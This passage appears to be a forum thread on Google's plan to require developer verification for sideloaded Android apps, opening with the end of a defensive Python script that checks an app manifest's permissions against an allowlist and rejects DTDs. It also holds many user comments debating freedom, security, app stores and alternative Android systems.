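    """Return the set of permission names a decoded manifest requests."""
    if manifest.startswith(AXML_MAGIC):
        raise ManifestRejected("binary AXML: decode the manifest first")
    if b"\x00" in manifest:
        raise ManifestRejected("NUL bytes: not UTF-8 text XML")
    upper = manifest.upper()
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        # Manifests need no DTD; refusing one avoids entity-expansion tricks.
        raise ManifestRejected("DTD or entity declarations are not accepted")
    try:
        root = ET.fromstring(manifest)
    except ET.ParseError as exc:
        raise ManifestRejected("unparseable manifest: %s" % exc)
    if root.tag != "manifest":
        raise ManifestRejected("root element is not <manifest>")
    perms = set()
    for tag in PERMISSION_TAGS:
        for element in root.iter(tag):
            name = element.get(NAME_ATTR)
            if not name:
                # A permission element we cannot read is a reason to refuse.
                raise ManifestRejected("<%s> without android:name" % tag)
            perms.add(name.strip())
    return perms


def evaluate(manifest, allowed=ALLOWED):
    """Return (accepted, reasons); anything unexpected fails closed."""
    try:
        perms = requested_permissions(manifest)
    except ManifestRejected as exc:
        return False, [str(exc)]
    extra = sorted(perms - allowed)
    if extra:
        return False, ["permission not on allowlist: %s" % p for p in extra]
    return True, []


# Constructed sample manifests (not taken from any real app).
SAMPLE_OK = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="Notes" />
</manifest>"""

SAMPLE_EXTRA = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission-sdk-23 android:name="android.permission.READ_CONTACTS" />
    <application android:label="Flashlight" />
</manifest>"""

SAMPLE_ENTITY = b"""<?xml version="1.0"?>
<!DOCTYPE manifest [<!ENTITY x "y">]>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" />"""

SAMPLE_BINARY = AXML_MAGIC + b"\x00" * 12

if __name__ == "__main__":
    for label, data in (("ok", SAMPLE_OK), ("extra", SAMPLE_EXTRA),
                        ("entity", SAMPLE_ENTITY), ("binary", SAMPLE_BINARY)):
        print(label, evaluate(data))
```

Declared permissions are only a first filter: the check says nothing about what an app does with network access, and it is only meaningful if the manifest evaluated comes from the exact APK that gets installed.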
How does this differ from Obtainium?
I wasn't aware of obtainium. Thank you. I was thinking of something more like Google Chrome mobile edition but for APKs. So more focus around the search interface.
Somehow I can run a webserver and anyone can browse it but if I make an app I need a DUNS number? What year is it?
Couldn't the CA system, for all its problems, suffice?
The further into this corporatized "vision" of technology we go, the more I relate to the elves in LoTR who basically said "our time is over" and then just leave Middle Earth.
There is no turning back. Generations of developers will grow up thinking every form of communication and technology by virtue of existing needs a corporate groundskeeper. Government identification will be required for most things.
I don't really blame the companies, though. Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online. What makes it all the more sour is that the very idea that things could be different is eroding away, too.
> Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online
Imagine if people felt that way about electrical power distribution? Every single thing you ever plugged in required a license to be validated at the time you tried to use an outlet?
For me, it's obvious that better ways of doing things exist, but I'm weird, and possibly a crank.
The solution, in my opinion, is to do the same thing we do with power in the home... limit the damage that can be done by anything plugged in, only giving away a limited capability for power delivery in a given outlet.
The analogous way to do this in an operating system is to discard the idea of providing all of the computing resources available to every program you run, and limit it in some way. The "permissions flags" we've all come to dread, first with UAC in Microsoft Windows, and now on our phones, obviously suck, and won't work.
The way to do it on a desktop, is to allow the user to choose exactly which resources a program may use, at runtime, by dialog boxes similar to the ones they already use, but with the additional behavior that the operating system enforces their choices, instead of just praying a program operates as intended.
On a phone, I don't have as strong an intuition, but I'm sure it can be worked out, both in a friendly, and secure way that doesn't require full time checking with consent from our betters in the corporate overlord hierarchy.
We can have secure and user friendly compute, both in our desktops, and in all our devices.
It's starting to look like I may end up with two phones. One with Lineage and most of my apps, hopefully, and another one with Play Protect which hopefully will be just my bank app. Google has become way too powerful and is encroaching step by step on our freedom, it's terrible. It's been going on for a long time. It's the IT equivalent of authoritarianism!!
Yeah, I think I will do that strategy as well. I will probably put Graphene on my next phone, and if any apps don't work I will keep them on another phone.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
The fact that people die with helmets on motorcycles should put an end to the argument that it's for our own good.
If you had to give away your privacy to use one and could only use helmets authorized by your motorcycle dealer you might have a point. We accept impositions on our freedom all the time when what we get in return is worth the sacrifice. If signed binaries actually delivered on their promise of keeping people safe there'd be a discussion that could be had on whether or not it'd be worthwhile, but since they don't actually protect people we'd be giving up our privacy for nothing.
What you said had absolutely nothing to do with your original illogical statement.
"the argument that it's for our own good." is their insistence that we should accept this loss of our freedom to run the software we want because it protects us. It doesn't actually protect us though, so it isn't worth it and we shouldn't accept it.
My original statement had nothing to do with motorcycle helmets, but if using them required us to give up enough of our freedoms they could also become unacceptable for the level of protection they provide (or fail to provide) us.
Is the right-click -> Open workaround not a thing any more on macOS?
Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens
There's a ctrl+open shortcut, if I remember correctly, which may be what the parent comment is referring to.
Nope, they've been making it steadily more difficult with each release. The control open shortcut no longer works.
Nope, it has been removed. Also God help you if you want to run something that needs system extensions..
You will need to boot to recovery mode, go through utility and enable it: https://support.apple.com/en-ca/guide/mac-help/mchl768f7291/...
Basically average users will never be able to pull this off.
As of macOS 15 (I think?), that shortcut stopped working, it will just show the same unverified software warning.
It requires a trip to a submenu in the Settings app now. You can’t do it simply or easily.
Microsoft does the same exact thing with SmartScreen, except that it has a whitelist for popular binaries.
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies? You know, the people that protest and make things change, how are they going to organize themselves when their government gets authoritarian and apple/google obey the government's request to forbid some app. You know, like what happened during the Hong Kong protests with the Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
> require your device to be running an official rom signed by Google
How exactly does the app detect this?
> At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
Next time you buy a phone, buy a supported model. Right?
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not an Apple fan either.
So where do we complain? (Aside from shaming Google on social media or writing to politicians.)
If I look through Google's contact links, it's all oriented around getting help with a problem rather than letting them know I'm going to move to something else if they go through with this. (And yes, even if Apple has the same types of restrictions on app store, if a more open alternative OS didn't work out for me, I'd move to them to punish the one dropping freedom of use.)
So for our non public company apps I will now have to verify? What.
Sideloading is the only reason I'm on Android. When it goes away, I will be better with an Apple device.
I knew this was coming thanks to the nincompoop bankers and IMDA together with horny uncles who fall for love/job scams here in Singapore. The reason I use android over iOS is that I can load apps for personal automation. I think the current scenario where bank apps refuse to run on phones with sideloaded apps is far more acceptable. I'm not sure scammers will not find a way around this. I can still be able to pin web apps.
FWIW I'd rather not use my phone for critical transactions, it's making authorities lazy. The number of times I've had to fight thanks to "buggy" payment code that deducts money is not funny and banks are getting worse at customer support day by day.
Also what the fuck are the governments doing with tax payer money, instead of going after criminals, we go after citizens.
If you think about it, the only thing that keeps this OS vendor in this duopolistic position is the fact that people rely on certain proprietary apps. We need ways to do things like messaging and banking in a universal way, just like we can do with email, calls, texts and web. Banking and messaging should be fully universal so we don't rely on specific apps only available on specific app stores. That would take all power away from these satanic US companies!!!
This is dangerous, they are trying to prevent people from creating apps that don't support their narrative.
What would happen to projects like F-Droid, Termux, etc.?
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
[1] https://news.ycombinator.com/item?id=41895718
Guess whether the makers of alternative YouTube clients will want to tell Google, "Hey, this is a copy of our ID card and our address"...
The only silver lining I see is if it allows you to bypass this by enabling dev mode on your phone. If you can't sideload unverified apps even in dev mode, that would be insanely bad.
IF that is the case, I'm actually willing to be slightly inclined to see this as a positive? We should normalize installing apps outside of Google Play, but that means malware becomes a serious issue with people downloading and installing random APKs.
e.g., this may normalize people hosting downloadable APKs whilst also reducing malware risk for "normies", which idealistically could weaken the "monopoly" of Google Play on android.
The problem is that Google is the gatekeeper.
Hopefully this increases the communal pressure to find a real alternative to android.
I'd wager there will be a buried setting to manually enable specific apps along with a warning. Like how macOS does it now by blocking unsigned apps.
It's only a question of time till DMCA takedowns will be abused to bring down every app which remotely competes with any business model.
This invalidates so many reasons to still use Android.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
Only Linux, BSD and other operating systems that are entirely Open Source.
Even Windows has scary warnings now that pop up unless you pay several hundred dollars a year plus you have to go through a completely unreasonable process (that often requires being shipped a physical USB device) just to sign your application.
I think they got emboldened by EU's impotent response to Apple's Digital Markets Act (DMA) violations.
Regardless, this is extremely bad news.
Time to donate to GrapheneOS[1] and alternatives[2]. Or contribute [3].
[1] https://grapheneos.org/donate
[2] https://members.calyxinstitute.org/donate
[3] https://grapheneos.org/hiring
Will GrapheneOS even survive the fact that Google will stop publishing Pixel code and such?
If you maintain it as a hard fork, why not? New phones' technical specification improvements have been diminishing in the last few years anyway. As long as it works, it can last for many years to come. The question is only in the project budget, I think.
Time to move to a dumb phone, I guess. Android is slowly becoming the worst of both worlds: none of the privacy features of iOS, yet the walls of the garden keep getting higher.
Totally deserved with how pathetically complacent and uncurious our society has become. We had it coming.
Gotta love when the megacorp steps in to "help".
Hmm this is weird. I've recently been considering switching back to Android because of how locked down iOS is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
This was probably the reason Nokia died. Symbian development was already cumbersome, and app deployment required some such procedure. I remember there was a joint effort in a China-based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it is, young executives repeating a simplistic and destructive strategy. IBM, Xerox, Nokia and Intel will be very proud.
Not so young, but just as short-term and thoughtless.
What about webapps?
This seems equivalent to Notarization on macOS. https://developer.apple.com/documentation/security/notarizin...
And once again our only hope is Elon Musk bringing out a competing smartphone ecosystem that is actually open.
sidenote: xAI just open-sourced Grok 2.5 and will open-source Grok 3 in 6 months.
My son uses an Android phone as a medical device with apps that are either downloaded or compiled. Hopefully this won't touch LineageOS.
Welp, I was euphemistically already not a fan of the developer experience for Android, now it's straight dead to me.
No reason to ever touch another day of Kotlin.
Come to think of it, why am I even on Android now as a user?
What's the alternative?
The better alternative? Dunno. An alternative is iPhone and just take some of the benefits that come with it. It's been a much more closed ecosystem from the start, but it's owned it. Google had a competitive advantage over that but they seem intent on throwing those advantages away with no foreseeable other upsides.
In development, working on completely other problem spaces to mobile development at all. It's not 2012 anymore and there are other noteworthy growth areas to spend time on.
But one thing in the short term: tonight I just spent some hours migrating registered accounts away from using a Gmail account to Proton.
Dumb phone, Linux on arm, Older devices with custom OS.
Does this break F-Droid?
Would be a tragedy if it did. So many interesting and useful apps there without the obnoxious ads or nagging to upgrade.
I'm entirely on F-Droid, with no Google account and no Play Store. Losing F-Droid would force me off Android.
I'm the same. No Google account since 2012. F-Droid is an amazing community effort and has enabled me to find so many great open source applications.
Same.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
Maybe F-Droid can sign all packages themselves? Would google let them do that?
The risk is Google could ban all F-Droid apps in one step, which will happen for sure.
"Can?" Sure.
"Would?" Google has zero incentive to do that.
There are APKs floating around from the Ice Cream Sundae days where the developer went out of business and is no longer on the Play Store, and this is literally the only way to run the app.
I have a Concept2 rower with the old PM3 monitor which is no longer supported by their ErgData app and the only way to connect my phone to my rower is by sideloading the ancient version of the app that supports it. So that's going to break now?
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
Exactly, the only reason to be a weirdo and have Android in the first place was because there are so many good apps available outside the Play Store. If they lock it down just like Apple then what's the point?
> what purpose does an open source OS have against a proprietary one
FOSS means a lot less than it used to in Android.
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
I would argue any amount we can get is still lightyears better than not being able to replace or inspect anything at all on the system.
A phone running just the FOSS parts of Android is not super viable for the average person.
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
One of the reasons I switched to Android was the freedom to make apks for my phone and not dealing with certificates, expiry dates, Google's approval, etc.
This is a depressing change if they follow through with this.
And "in the name of security" doesn't pass the smell test if there is no way to opt out.
So, FairPhone with a new OS then?
Well that sucks. So basically all the money we've had taken from us for our Play Store apps is now "just" going to be spent on administering the registration details of 800 million Chinese developers and 6 billion bot accounts.
Whose smart idea was that.
Remind me why we keep using smart phones? They feel like a noose around our collective necks.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become the eyes of the govs, while the Internet is something akin to their neural system. What's more interesting is why the govs feel so paranoid and insecure recently. What are they afraid of?
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
It's also worth reading Stallman's "Right to Read" again, to see how scarily prescient he was.
Before quickly running to dismiss this move, please at least do your research with regards to the situation in the countries mentioned in the article, especially Singapore and Thailand.
Side-loaded malware has been an epidemic in SE Asia, and there are MILLIONS of dollars stolen (mostly from pensioners!) via side-loaded malware disguised as gambling apps - the local population is particularly susceptible to gambling, especially the older generations that are not so tech-savvy.
It's good they decided to do something about it.
So make it an unlockable feature with a big red warning saying something like: 'If you unlock this feature, your money might be stolen, malware could infiltrate your system. You take full responsibility and acknowledge that you are tech-savvy.'
I'm sure if my grandma saw something like that, she wouldn't click it. This way, people who want to stay in a closed garden are protected, while those who want full control have it. The current implementation seems designed for state interests, not the people's.
It shouldn't be impossible. Not every FOSS developer will want to register, or be mature enough, or may be from sanctioned countries, and so forth.
Private app companies should be and are doing more to protect against malware.
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identify and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
[0] - https://www.abm.org.my/press-releases/banks-to-enable-malwar...
The requirement per Google's post is rolling out globally though in a couple years. There was nothing stopping per country governments that this may disproportionately affect from requiring this for Play Protect/GMS certified Android devices sold in their region but enforcing it worldwide for such non-AOSP devices I don't find surprising to be controversial.
Brave of you to say this. Yeah, in my humble opinion, I agree with you: Android and iOS devices target the mainstream users more than, say, PCs or Macs, and should be more locked down. We can keep PCs and Macs relatively open (although they are getting more secure too, which might be good?), but for devices that truly target the masses, secure them as much as possible (why would typical users like my parents need to install a remote access server on their phone?).
Yeah, my Dad got hacked only a month ago, through a tech-support phishing phone call. He uses a Windows PC which makes him vulnerable, and the scammers did install tons of evil crap. He really should be using an Android or iOS tablet, to reduce his chances of being hacked like this. I know these devices are still vulnerable, but they do seem more secure based on how much more locked down they are.
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
Well, when that happens it is finally goodbye to Android from me. I am switching to iOS that day.
This is what Apple already does, isn't it? Why wouldn't it work for Google too?
Apple requires you to get a developer account with them.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
Never heard of DUNS. It seems to be a US company (Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangladesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
I've had a business get listed on DUNS; once you're on it, they resell your data forever.
It’s not just Apple, lots of federal programs in US require a DUNS number.
To be clear, Apple does not require a DUNS number for developer registration.
It does if you have an org account: https://developer.apple.com/programs/enroll/
Yeah, basically this is the rise of computer-credit agencies.
You can see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both its appearance on the app store and any developer who'd program similar.
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
Yes. You gotta pay your 100 bucks, but I don't remember feeling like my privacy was being invaded when getting a developer account. I assume the best reason they have for this is that they can nuke the account, effectively killing the install base of an app that is reported to be malicious. Unless someone tells me why I should, I don't have a huge issue with this.
While the linked article notes that organizations require a DUNS number seemingly as an aside, personal accounts do not.
Which is exactly the same policy as Apple.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such a claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
> For me the difference is that Android is an open-source operating system
Google Play is not open source. You're still free to sideload on phones that use vanilla open-source Android like the Fairphone.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out of the Play Store progressively.
I'm cancelling my Pixel 10 preorder.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general-purpose computer)
I see how this is developing. First going more or less closed source and then reeling in the freedom - they are not going so much Microsoft but Apple.
Will this affect GrapheneOS users who have Play Protect / Services disabled? Wondering how they intend to do the verification.
This would affect a lot of apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
Maybe we need phone sized open source computers.
The only saving grace is you can always import a Chinese phone without the play store at all, and then you can install what you want.
One step closer to The Right to Read: https://www.gnu.org/philosophy/right-to-read.html
Will this be what finally leads to the success of a fully open-source Android fork such as CalyxOS or GrapheneOS?
CalyxOS is already dead. GrapheneOS is the only hope.
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
Are there any competing phone OSes still around? Maybe there is something in China I don't have a view on?
https://en.wikipedia.org/wiki/HarmonyOS
It does have an Android subsystem stuck on, but it's not necessary.
https://puri.sm/products/
We really need a third alternative when it comes to mobile
This is a dangerous thing to do! This severely limits the freedom of the internet. At this point, we'd need a new "OS" like dhh did with Omarchy!
Can Google do something like this for entities wishing to advertise on their platform?
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
"A recent analysis by the company found that there are 'over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.'"
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
terrible news. i don't like it a bit. wth are they doing? i know all they care about is money but this is bad for everyone.
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'
Stallman warned us.
https://www.gnu.org/philosophy/right-to-read.en.html
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk.
Stallman is probably in the top 10 of all time in terms of people who facilitated alternatives to this. He invented the GPL and wrote and maintained a ton of tools for people running alternative software stacks to use. What more would you ask for?
No, you're right. He deserves more credit than that. But still, the idea that you can just expect people to not use a smartphone is wrong.
I've edited my post to not claim that all Stallman did was talk, which would've been wrong.
> He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
>I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
This is kind of a lazy approach, and it's a good thing Stallman did not have that attitude towards personal computers.
But it's a bummer that there's no real equivalent for mobile devices. I use an Android device and I already consider it to be more locked down than Windows. Generally more irritating than Windows as well (maybe not Windows 11)
I also use it as little as possible (unfortunately more and more things require it) and try to get the smallest functional (for me) Android devices.
There are alternatives, using them involves sacrifices though, and there the modem baseband isn't replaceable yet. Take a look at GrapheneOS, F-Droid, Replicant, Purism Librem, PinePhone, PostmarketOS, PureOS, Mobian etc.
https://wiki.debian.org/Mobile
Okay, let's say you just became an enlightened person who understands that the current state of things needs to be fixed.
To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
The speakers of the world have their place, of course, but that's not the most important part of the solution.
> To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
Such people both lead by example, and try to inspire others towards following their example/lifestyle. The problem rather is that most people want a different lifestyle (in the particular example of privacy and freedom "one with less radical consequences", which I consider to be rather contradictory, but this discussion shall be off topic).
To give an analogue: many vegetarians both lead by example, and inspire others to become vegetarians. But many people nevertheless don't want to become vegetarians.
> The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
Like GNU?
Guess I'm getting an iPhone. If both are locked down, I may as well have the one that has a decent watch.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
The problem here is that the EU, which would normally be the only hope to put a stop to bullshit like this, seems to like this.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
https://www.bbc.com/news/magazine-26328105
https://en.wikipedia.org/wiki/Parents_Music_Resource_Center
https://en.wikipedia.org/wiki/Seduction_of_the_Innocent
https://www.nytimes.com/1997/02/27/business/job-insecurity-o...
Yanking the leash of the proletariat
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
The Internet is the most powerful propaganda distributing system that humanity has ever come up with. Autocracies love the Internet, or at least the ones that see the writing on the wall. We have the sum total knowledge of the entire human race within a few clicks and we mostly use it to find videos to be mad at. We are our own jailors.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust that Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
> Why should I be forced to trust Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
> It's my device. I should control it, full stop.
No one is forcing you to buy a particular device.
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
Time to support open source mobile OS's then.
I’m willing to sacrifice your rights if it means that there’s less incentive to steal my phone
why do you think you have any say over others' rights? using that same logic, you know what? i think you're going to steal my phone. so do you mind if i sacrifice your rights and install a camera right in your room? wouldn't want you to plot the theft of my phone now would i
I'd argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See Windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on Android is not a standard setting you can flick on. Is there any data on the number of devices that have this enabled and are falling for hacked apps?
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they aren't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
In what way? Seriously, what benefit is there? (And don't say security...)
Not having social media?
The world would be a much better place if we only had calls and direct messages.
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
> this is a clear win for the average user.
In the short term, yes. In the long term, it means Google can ban any app it doesn't like, and it means governments can compel it to do so.
Governments being able to ban software without easy workarounds could have far-reaching consequences affecting people who don't even use the software in question. This is a Bad Thing even if it helps keep a few people from getting scammed.
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
